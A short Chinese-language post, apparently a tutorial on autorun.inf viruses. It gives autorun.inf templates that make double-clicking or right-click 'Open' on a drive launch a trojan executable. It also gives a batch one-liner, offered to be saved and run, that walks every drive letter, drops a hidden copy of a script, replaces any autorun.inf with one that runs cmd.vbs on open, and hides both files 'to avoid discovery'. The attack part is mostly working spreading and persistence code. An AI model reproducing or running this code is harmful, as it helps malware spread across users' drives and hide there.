autorun.inf类病毒

[AutoRun]
open=2007.exe
shellexecute=2007.exe
shell/Auto/command=2007.exe

 

[AutoRun]
open=2007.exe
shellexecute=2007.exe
shell/打开/command=2007.exe
shell=打开

蓝色是即使右击“打开” 也是运行木马（不管双击还是右击  ^-^） 

open可以打开.exe .com .bat类文件

将以下代码用记事本写入，保存为1.bat,点击即可看到效果：
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z)do @copy /y cmd.bat %%i:/cmd.bat & @attrib +s +h %%i:/cmd.bat & (if exist %%i:/autorun.inf (attrib -r -a -s -h %%i:/autorun.inf & del %%i:/autorun.inf)) & echo [AutoRun]>%%i:/autorun.inf & echo shell/Open/command=cmd.vbs>>%%i:/autorun.inf & echo shell/Open=打开(^&O)>>%%i:/autorun.inf & echo shell/explore=资源管理器(^&O)>>%%i:/autorun.inf & echo shell/explorer/command=cmd.vbs>>%%i:/autorun.inf & attrib +s +h %%i:/autorun.inf
这段代码意思是遍历各盘，搜索autorun.inf文件，有就删掉，然后在每个盘下重建autorun.inf，并未它加上隐藏及系统属性，防止被发现，然后向autorun.inf中写入自动播放的代码，其中cmd.vbs和cmd.bat就是我假设的病毒,当双击盘符时就会自动打开cmd.vbs文件。